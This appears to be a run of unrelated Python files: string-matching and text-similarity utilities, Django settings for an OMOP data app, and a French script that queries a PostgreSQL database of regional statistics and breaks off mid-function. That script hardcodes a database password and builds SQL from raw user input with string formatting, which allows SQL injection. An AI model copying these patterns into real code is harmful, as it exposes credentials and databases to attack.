assert abs(expected_sparsity_values['russian'] - sp_phi_rus.value) < tolerance
assert abs(expected_sparsity_values['english'] - sp_phi_eng.value) < tolerance
finally:
shutil.rmtree(batches_folder)
|
from django.db import models
from django.contrib.auth.models import AbstractUser
class CustomUser(AbstractUser):
pass
# add additional fields in here
def __str__(self):
return self.username
|
def matching_KMP(t, p, pnext):
j, i = 0, 0
n, m = len(t), len(p)
while j < n and i < m:
if i == -1 or t[j] == p[i]:
j, i = j+1, i+1
else:
i = pnext[i]
if i == m:
return j-i
return -1
def gen_pnext(p):
i, k, m = 0, -1, len(p)
pnext = [-1] * m
while i < m-1:
if k == -1 or p[i] == p[k]:
i, k = i+1, k+1
pnext[i] = k
else:
k = pnext[k]
return pnext
# Improved version: when p[i] == p[k], inherit pnext[k] so a failed match skips the redundant comparison
def genPnext(p):
i, k, m = 0 , -1, len(p)
pnext = [-1]*m
while i < m-1:
if k == -1 or p[i] == p[k]:
i, k = i+1, k+1
if p[i] == p[k]:
pnext[i] = pnext[k]
else:
pnext[i] = k
else:
k = pnext[k]
return pnext
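# A minimal usage sketch (added for illustration): both failure-table builders
# should locate the pattern at the same position.
if __name__ == '__main__':
    text = 'ababcabcacbab'
    pattern = 'abcac'
    print(matching_KMP(text, pattern, gen_pnext(pattern)))  # expected: 5
    print(matching_KMP(text, pattern, genPnext(pattern)))   # expected: 5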
|
def postprocess_decoded_seq(answers):
"""
Corrects for some extra spaces that are created by the decode method
of the tokenizer like in numerical strings
example: 1, 000, 000 --> 1,000,000
Args:
answers: list[str]
Returns:
new_answers: list[str]
"""
new_answers = []
for answer in answers:
parts = answer.split(", ")
if len(parts) > 1:
try:
new0 = parts[0]
for i in range(1, len(parts)):
if new0[-1].isnumeric() and parts[i][0].isnumeric():
if len(parts[i]) > 3 and parts[i][3].isnumeric():
new0 = ", ".join([new0, parts[i]])
else:
new0 = ",".join([new0, parts[i]])
else:
new0 = ", ".join([new0, parts[i]])
except IndexError:
print("--> IndexError:", answer)
new0 = answer
else:
new0 = answer
parts = new0.split(". ")
if len(parts) > 1:
new1 = parts[0]
for i in range(1, len(parts)):
try:
if new1[-1].isnumeric() and parts[i][0].isnumeric():
new1 = ".".join([new1, parts[i]])
else:
new1 = ". ".join([new1, parts[i]])
except IndexError:
new1 = parts[1]
else:
new1 = new0
parts = new1.split(" : ")
if len(parts) > 1:
new2 = parts[0]
for i in range(1, len(parts)):
if new2[-1].isnumeric() and parts[i][0].isnumeric():
new2 = ":".join([new2, parts[i]])
else:
new2 = " : ".join([new2, parts[i]])
else:
new2 = new1
new_answers.append(new2)
return new_answers
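# Illustrative check (the inputs below are hypothetical decoder outputs):
if __name__ == "__main__":
    print(postprocess_decoded_seq(["1, 000, 000 dollars", "3. 14"]))
    # -> ['1,000,000 dollars', '3.14']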
|
import os
# Import global settings to make it easier to extend settings.
from django.conf.global_settings import *
from django.core.exceptions import ImproperlyConfigured
def get_env_variable(var_name):
""" Get the environment variable or return an exception"""
try:
return os.environ[var_name]
except KeyError:
error_msg = "Set the %s environment variable" % var_name
raise ImproperlyConfigured(error_msg)
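# Example usage (the variable name below is hypothetical; an unset variable
# raises ImproperlyConfigured instead of failing silently):
# SECRET_KEY = get_env_variable('OMOP_HARVEST_SECRET_KEY')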
# Import the project module to calculate directories relative to the module
# location.
PROJECT_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../..')
# List all Django apps here. Note that standard Python libraries should not
# be added to this list since Django will not recognize them as apps anyway.
# An app is really only an "app" if a `models` module or package is defined.
# Read more about projects vs. apps here:
# https://docs.djangoproject.com/en/1.3/intro/tutorial01/#creating-models
INSTALLED_APPS = (
'omop_harvest',
'south',
'serrano',
'avocado',
'modeltree',
'haystack',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.markup',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'chopauth',
'registration'
)
#
# ADMINISTRATIVE
#
# TODO: Add admins here.
# Admins receive any error messages by email if DEBUG is False
ADMINS = ()
# Managers receive broken link emails if SEND_BROKEN_LINK_EMAILS is True
MANAGERS = ADMINS
# List of IP addresses which will show debug comments
INTERNAL_IPS = ('127.0.0.1', '::1')
DEBUG = True
TEMPLATE_DEBUG = DEBUG
#
# DATABASES
# Each database can be specified here, but passwords should be in a separate
# file that is not versioned. Use ``local_settings.py``.
#
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_PATH, 'harvest.db')
},
'omop': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_PATH, 'omop.db')
}
}
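# A minimal sketch of the ``local_settings.py`` override suggested above
# (hypothetical names and credentials; that file stays out of version control):
#
# DATABASES['default'].update({
#     'ENGINE': 'django.db.backends.postgresql_psycopg2',
#     'NAME': 'omop_harvest',
#     'USER': 'harvest_user',
#     'PASSWORD': '<not-versioned>',
# })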
DATABASE_ROUTERS = ('omop_harvest.routers.OmopRouter',)
#
# LOCALITY
#
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = None
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = False
#
# STATIC AND MEDIA
# The application's static files should be placed in the STATIC_ROOT in
# addition to other static files found in third-party apps. The MEDIA_ROOT
# is intended for user uploaded files.
#
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PROJECT_PATH, '_site/media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PROJECT_PATH, '_site/static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# TODO: Remove this. Shouldn't the files at the below location
# be collected under '_site/static'?
# Additional locations of static files
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
# project level static files
STATICFILES_DIRS = (
os.path.join(PROJECT_PATH, 'omop_harvest', 'static'),
)
#
# TEMPLATES
#
# Project level templates and template directories that override
# third-party app templates.
TEMPLATE_DIRS = ()
# Context processors are simply functions that return a dict which augments the
# template context.
TEMPLATE_CONTEXT_PROCESSORS += (
'django.core.context_processors.request',
'omop_harvest.context_processors.static',
)
#
# URLS
#
# FORCE_SCRIPT_NAME overrides the interpreted 'SCRIPT_NAME' provided by the
# web server. Since the URLs below are used for various purposes outside of
# the WSGI application (static and media files), these need to be updated to
# reflect this discrepancy.
FORCE_SCRIPT_NAME = ''
LOGIN_URL = FORCE_SCRIPT_NAME + '/login/'
LOGIN_REDIRECT_URL = FORCE_SCRIPT_NAME + '/query/'
LOGOUT_URL = '/logout/'
ROOT_URLCONF = 'omop_harvest.conf.urls'
# For non-publicly accessible applications, the siteauth app can be used to
# restrict access site-wide.
# SITEAUTH_ACCESS_ORDER = 'allow/deny'
#
SITEAUTH_ALLOW_URLS = (
r'^log(in|out)/',
r'^password/reset/',
r'^(register|verify)/',
)
SITEAUTH_DENY_URLS = (
r'^workspace/',
r'^workspace/discover/',
r'^query/',
r'^results/+',
r'^api/+',
r'^details/\d+/',
r'^moderate/+',
r'^verify/+',
)
#
# MIDDLEWARE
#
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'siteauth.middleware.SiteAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'serrano.middleware.SessionMiddleware',
)
#
# EMAIL
#
SUPPORT_EMAIL = 'cbmisupport@email.chop.edu'
DEFAULT_FROM_EMAIL = 'cbmisupport@email.chop.edu'
EMAIL_SUBJECT_PREFIX = '[omop_harvest] '
SEND_BROKEN_LINK_EMAILS = False
#
# LOGGING
#
# A sample logging configuration. Besides emailing the site admins on every
# HTTP 500 error (when DEBUG is False), it writes rotating log files for the
# application and request loggers and streams app logs to the console.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
}
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'default': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'logs/omop_harvest.log',
'maxBytes': 1024*1024*5, # 5 MB
'backupCount': 5,
'formatter': 'standard',
},
'request_handler': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': 'logs/omop_harvest_requests.log',
'maxBytes': 1024*1024*5, # 5 MB
'backupCount': 5,
'formatter': 'standard',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
}
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'DEBUG',
'propagate': True
},
'django.request': {
'handlers': ['request_handler'],
'level': 'DEBUG',
'propagate': False
},
'avocado': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
'serrano': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
}
}
#
# CACHE
#
# For production environments, the memcached backend is highly recommended
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique',
'KEY_PREFIX': 'omop_harvest',
'VERSION': 1,
}
}
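# A rough sketch of the memcached backend recommended above for production
# (the host/port below are hypothetical; kept commented out here):
#
# CACHES['default'] = {
#     'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#     'LOCATION': '127.0.0.1:11211',
#     'KEY_PREFIX': 'omop_harvest',
#     'VERSION': 1,
# }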
CACHE_MIDDLEWARE_SECONDS = 0
# This is not necessary to set if the above `KEY_PREFIX` value is set since
# the `KEY_PREFIX` namespaces all cache keys set by this application
CACHE_MIDDLEWARE_KEY_PREFIX = 'omop_harvest'
#
# SESSIONS AND COOKIES
#
CSRF_COOKIE_NAME = 'omop_harvest_csrftoken'
# SESSION_COOKIE_AGE = 60 * 20
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
SESSION_COOKIE_NAME = 'omop_harvest_sessionid'
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_SAVE_EVERY_REQUEST = False
#
# OTHER PROJECT SETTINGS
#
# USE_ETAGS = True
IGNORABLE_404_PATHS = (
r'robots.txt$',
r'favicon.ico$',
)
#
# VARIOUS APP SETTINGS
#
# The primary key of the ``Site`` object for the Sites Framework
SITE_ID = 1
#
# ModelTrees Configuration
#
MODELTREES = {
'default': {
'model': 'omop_harvest.Person',
}
}
#
# Haystack Configuration
#
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(os.path.dirname(__file__), '../../whoosh.index'),
}
}
#
# Avocado Configuration
#
# TODO: Should data_cache_enabled be set to True?
AVOCADO = {
'DATA_CACHE_ENABLED': False,
'METADATA_MIGRATION_APP': 'omop_harvest',
}
|
# -*- coding: utf-8 -*-
__author__ = 'CongRong <tr3jer@gmail.com>'
import difflib
from .utils.compat import bytes_decode, xrange
hashbits = 128
difflib_threshold = 0.95
simhash_threshold = 0.95
def simhash(tokens):
    # SimHash fingerprint: accumulate per-bit votes over the token hashes,
    # then set bit i of the fingerprint when the vote v[i] is non-negative.
    v = [0] * hashbits
for t in [string_hash(x) for x in tokens]:
for i in xrange(hashbits):
bitmask = 1 << i
if t & bitmask:
v[i] += 1
else:
v[i] -= 1
fingerprint = 0
for i in xrange(hashbits):
if v[i] >= 0:
fingerprint += 1 << i
return fingerprint
def string_hash(source):
if source == "":
return 0
else:
x = ord(source[0]) << 7
m = 1000003
mask = 2 ** hashbits - 1
for c in source:
x = ((x * m) ^ ord(c)) & mask
x ^= len(source)
if x == -1:
x = -2
return x
def hamming_distance(hash1, hash2):
    # Count the differing bits between two fingerprints (Kernighan's bit trick).
    x = (hash1 ^ hash2) & ((1 << hashbits) - 1)
tot = 0
while x:
tot += 1
x &= x - 1
return tot
def similar(content1, content2, engine='difflib'):
'''
    :param content1: first content to compare
    :param content2: second content to compare
    :param engine: [optional] 'difflib' or 'simhash'; defaults to 'difflib'
    :return: bool
'''
content1, content2 = map(lambda x: bytes_decode(x), [content1, content2])
    sim = False
    if engine == 'difflib':
        if difflib.SequenceMatcher(None, content1, content2).quick_ratio() > difflib_threshold:
            sim = True
    elif engine == 'simhash':
        hash1 = simhash(content1.split())
        hash2 = simhash(content2.split())
        hamming = hamming_distance(hash1, hash2)
        res = float(hashbits - hamming) / hashbits
        # Use a local threshold so the module-level default is never shadowed;
        # it is lowered slightly whenever the fingerprints differ at all.
        threshold = 0.90 if hamming else simhash_threshold
        sim = res >= threshold
    return sim
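# Illustrative usage; the package-relative import above means this module is used
# from within its package, so the calls below are only a sketch:
# similar("hello world", "hello world!")            # difflib engine -> True
# similar(text_a, text_b, engine='simhash')         # fingerprint-based comparison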
|
print('Hello, World.')
# CONSOLE OUTPUT:
# Hello, World.
|
#================================================================
# A set of SQL queries run against a database hosted on a local
# PostgreSQL server
#
# Required Python modules
#   psycopg2 (SQL connection)
#   pandas (DataFrame and HTML)
#   matplotlib
#   jinja2 (HTML styles)
#
# Alexandre Cornier - 2020
#================================================================
import psycopg2
import pandas as pd
import webbrowser
import pathlib
# Console display switch
bconsole = False  # no console output by default
#---------------------------- Database connection ------------------------------------
connection = psycopg2.connect("host=localhost port=5432 dbname=cremi user=postgres password=Audierne")
cur = connection.cursor()
#-------------------------------------- Functions ------------------------------------------------
# Display the results as HTML in the browser
def affiche_html(titre_question, question, fichier, resultat_html):
    # Prepare the HTML file header
header = """<!DOCTYPE html>
<html>
<head>
<title>""" + titre_question + """</title>
</head>
<body>
<h1>""" + titre_question + """</h1>
<p>""" + question + """</p>
"""
footer = """
</body>
</html>"""
# write html to file
text_file = open(fichier, "w")
text_file.write(header)
text_file.write(resultat_html)
text_file.write(footer)
text_file.close()
# open report.html in browser
current_path = pathlib.Path(__file__).parent.absolute()
fichier = "file://" + str(current_path) + "/" + fichier
webbrowser.open(fichier)
# Question 1
def listeRegions():
cur.execute("""SELECT reg, libelle FROM regions ORDER BY reg""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "RΓ©gion" else '' for i in x])
.hide_index()
.render())
affiche_html("Question 1", "RΓ©gions prΓ©sentes dans la base de donnΓ©es",\
"question_01.html", html)
if (bconsole):
print("les rΓ©gions prΓ©sentes dans la base de donnΓ©es sont : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 2
def listeDepartement():
cur.execute("""SELECT dep, libelle FROM departements ORDER BY dep""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code dΓ©partement', 'DΓ©partement'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.hide_index()
.render())
affiche_html("Question 2", "DΓ©partements prΓ©sents dans la base de donnΓ©es",\
"question_02.html", html)
if (bconsole):
print("les dΓ©partements prΓ©sents dans la base de donnΓ©es sont : ")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 3
def choixRegions():
print("Donnez le nom de la rΓ©gion :")
choix = input().capitalize()
cur.execute("""SELECT * FROM regionsocial WHERE region = '%s' """ % choix)
lst = []
for info in cur.fetchall():
lst=[["NumΓ©ro", info[0]],
["Taux de pauvretΓ© (%)", info[2]],
["Part des jeunes non insΓ©rΓ©s (%) en 2014", info[3]],
["Part des jeunes non insΓ©rΓ©s (%) en 2009", info[4]],
["Poids de l'Γ©conomie sociale dans les emplois salariΓ©s du territoire (%)", info[5]]]
df = pd.DataFrame(lst, columns=['Information', 'Valeur'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.set_properties(subset=["Valeur"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 3", "Informations concernant la rΓ©gione " + choix,\
"question_03.html", html)
if (bconsole):
print("-------------- Informations concernant", choix, "--------------")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 4
def choix_departement_theme():
print("Donnez le nom du dΓ©partement :")
choix1 = input().capitalize()
print("Choisissez un thème : 1.Social ou 2.Environnement (par défaut)")
choix2 = input()
lst = []
if choix2 == "1" or choix2.lower() == "social":
cur.execute("""SELECT * FROM departementsocial WHERE departements = '%s' """ % choix1)
for info in cur.fetchall():
lst = [["NumΓ©ro", info[0]],
["EspΓ©rance de vie des hommes Γ la naissance en 2015 (annΓ©es)", info[2]],
["EspΓ©rance de vie des hommes Γ la naissance en 2010 (annΓ©es)", info[3]],
["EspΓ©rance de vie des femmes Γ la naissance en 2015 (annΓ©es)", info[4]],
["EspΓ©rance de vie des femmes Γ la naissance en 2010 (annΓ©es)", info[5]],
["Part de la population Γ©loignΓ©e de plus de 7 mn des services de santΓ© de proximitΓ© (%) en 2016", info[6]],
["Part de la population estimΓ©e en zone inondable (%)", info[7]]]
df = pd.DataFrame(lst, columns=['Information', 'Valeur'])
df["Valeur"] = pd.to_numeric(df["Valeur"], errors='coerce')
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.format({"Valeur": "{:.1f}"})
.set_properties(subset=["Valeur"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 4a",\
"Informations sociales concernant le dΓ©partement " + choix1,\
"question_04a.html", html)
if (bconsole):
df["Valeur"] = df["Valeur"].map("{:.1f}".format)
print("-------------- Informations concernant", choix1, "--------------")
print(df)
else :
cur.execute("""SELECT * FROM departementenvironnement WHERE departements = '%s' """ % choix1)
for info in cur.fetchall():
lst = [["NumΓ©ro", info[0]],
["Taux de valorisation matière et organique (%) en 2013", info[2]],
["Taux de valorisation matière et organique (%) en 2009", info[3]],
["Part de surfaces artificialisΓ©es (%) en 2012", info[4]],
["Part de surfaces artificialisΓ©es (%) en 2006", info[5]],
["Part de l'agriculture biologique dans la surface agricole totale (%) en 2016", info[6]],
["Part de l'agriculture biologique dans la surface agricole totale (%) en 2010", info[7]],
["Production de granulats (tonnes) en 2014", info[8]],
["Production de granulats (tonnes) en 2009", info[9]],
["Eolien (%) en 2015", info[10]],
["Eolien (%) en 2010", info[11]],
["PhotovoltaΓ―que (%) en 2015", info[12]],
["PhotovoltaΓ―que (%) en 2010", info[13]],
["Autre (biogaz, biomasse, gΓ©othermie, incinΓ©ration de dΓ©chets, petite hydraulique) (%) en 2015",info[14]],
["Autre (biogaz, biomasse, gΓ©othermie, incinΓ©ration de dΓ©chets, petite hydraulique) (%) en 2010",info[15]]]
df = pd.DataFrame(lst, columns=['Information', 'Valeur'])
df["Valeur"] = pd.to_numeric(df["Valeur"], errors='coerce')
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.format({"Valeur": "{:.1f}"})
.set_properties(subset=["Valeur"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 4b",\
"Informations environnementales concernant le dΓ©partement " + choix1,\
"question_04b.html", html)
if (bconsole):
df["Valeur"] = df["Valeur"].map("{:.1f}".format)
print("-------------- Informations concernant", choix1, "--------------")
print(df)
if (bconsole):
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 5
def typeEnergie():
print("Choisissez un type d'energie : 1.Eolien, 2.Photovoltaique ou 3.Autre")
choix = input()
if choix == "1" or choix.lower() == "eolien":
cur.execute("""SELECT nb, departements, eolien2015 - eolien2010 AS croissance FROM departementenvironnement
WHERE eolien2015 > eolien2010
ORDER BY eolien2015 - eolien2010 DESC""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code', 'DΓ©partement', 'Croissance'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Croissance"])
.format({"Croissance": "{:.1f}pts"})
.set_properties(subset=["Croissance"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 5a",\
"DΓ©partements oΓΉ la part de l'Γ©nergie Γ©olienne a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence",\
"question_05a.html", html)
if (bconsole):
df["Croissance"] = df["Croissance"].map("{:.1f}pts".format)
print(
"Voici la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence : ")
print(df)
if choix == "2" or choix.lower() == "photovoltaique":
cur.execute("""SELECT nb, departements, photovoltaique2015 - photovoltaique2010 AS croissance FROM departementenvironnement
WHERE photovoltaique2015 > photovoltaique2010
ORDER BY photovoltaique2015 - photovoltaique2010 DESC""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code', 'DΓ©partement', 'Croissance'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Croissance"])
.format({"Croissance": "{:.1f}pts"})
.set_properties(subset=["Croissance"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 5b",\
"DΓ©partements oΓΉ la part de l'Γ©nergie photovoltaΓ―que a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence",\
"question_05b.html", html)
if (bconsole):
df["Croissance"] = df["Croissance"].map("{:.1f}pts".format)
print("Voici la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence : ")
print(df)
if choix == "3" or choix.lower() == "autre":
cur.execute("""SELECT nb, departements, autre2015 - autre2010 AS croissance FROM departementenvironnement
WHERE autre2015 > autre2010
ORDER BY autre2015 - autre2010 DESC""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code', 'DΓ©partement', 'Croissance'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Croissance"])
.format({"Croissance": "{:.1f}pts"})
.set_properties(subset=["Croissance"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 5c",\
"DΓ©partements oΓΉ la part des Γ©nergies renouvelables autres a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence",\
"question_05c.html", html)
if (bconsole):
df["Croissance"] = df["Croissance"].map("{:.1f}pts".format)
print("Voici la liste des dΓ©partements oΓΉ la part de cette Γ©nergie a augmentΓ© entre les deux annΓ©es de rΓ©fΓ©rence : ")
print(df)
if (bconsole):
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 6
def tonnes():
cur.execute("""SELECT departements.reg, regions.libelle AS region, departements.libelle AS departement
FROM departements, regions
WHERE departements.reg
IN (SELECT departements.reg from departements
INNER JOIN departementenvironnement
ON departements.dep = departementenvironnement.nb
INNER JOIN regions
ON departements.reg = regions.reg
GROUP BY departements.reg
HAVING SUM(prodgranulat2014) > 25000000
AND SUM(prodgranulat2014) <> 'NaN')
ORDER BY region, departement""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion', 'DΓ©partement'])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.hide_index()
.render())
affiche_html("Question 6",\
"DΓ©partements dont la rΓ©gion a eu une production de granulats supΓ©rieure Γ 25 000 000 tonnes en 2014",\
"question_06.html", html)
if (bconsole):
print("les dΓ©partements dont la rΓ©gion a eu une production de granulats supΓ©rieure Γ 25 000 000 tonnes en 2014 sont :")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 7
def topFive():
cur.execute("""SELECT nb, departements, eolien2015 FROM departementenvironnement
ORDER BY nullif(eolien2015, 'NaN')
DESC nulls last LIMIT 5""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code dΓ©partement', 'DΓ©partement', "Part de l'Γ©nergie Γ©olienne en 2015"])
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
('font-family', 'verdana')]},
{'selector': 'td', 'props': [('font-family', 'verdana')]}])
.apply(lambda x: ['background: lightblue' if x.name == "DΓ©partement" else '' for i in x])
.background_gradient(cmap='Blues', subset=["Part de l'Γ©nergie Γ©olienne en 2015"])
.format({"Part de l'Γ©nergie Γ©olienne en 2015": "{:.1f}%"})
.set_properties(subset=["Part de l'Γ©nergie Γ©olienne en 2015"], **{'text-align': 'right'})
.hide_index()
.render())
affiche_html("Question 7",\
"Les 5 dΓ©partements avec le plus grand taux dβΓ©nergie Γ©olienne comme source de la puissance Γ©lectrique en 2015",\
"question_07.html", html)
if (bconsole):
df["Part de l'Γ©nergie Γ©olienne en 2015"] = df["Part de l'Γ©nergie Γ©olienne en 2015"].map("{:.1f}%".format)
print("Les 5 dΓ©partements avec le plus grand taux dβΓ©nergie Γ©olienne comme source de la puissance Γ©lectrique en 2015 sont :")
print(df)
print("Appuyez sur entrΓ©e pour revenir au menu")
input()
# Question 8
def weak():
cur.execute("""SELECT regions.reg, regions.libelle AS region,
departements.libelle AS departement, departementenvironnement.valorisationorga2013
FROM departements
INNER JOIN regions
ON departements.reg = regions.reg
INNER JOIN departementenvironnement
ON departements.dep = departementenvironnement.nb
ORDER BY nullif(valorisationorga2013, 'NaN') nulls last LIMIT 1""")
query_result = cur.fetchall()
df = pd.DataFrame(query_result, columns=['Code rΓ©gion', 'RΓ©gion', 'DΓ©partement', 'Valorisation en 2013'])
    # Format the values
df["Valorisation en 2013"] = df["Valorisation en 2013"].map("{:.1f}".format)
html = (df.style
.set_table_styles([
{'selector': 'tr:nth-of-type(odd)', 'props': [('background', '#eee')]},
{'selector': 'tr:nth-of-type(even)', 'props': [('background', 'white')]},
{'selector': 'th', 'props': [
('background', '#606060'),
('color', 'white'),
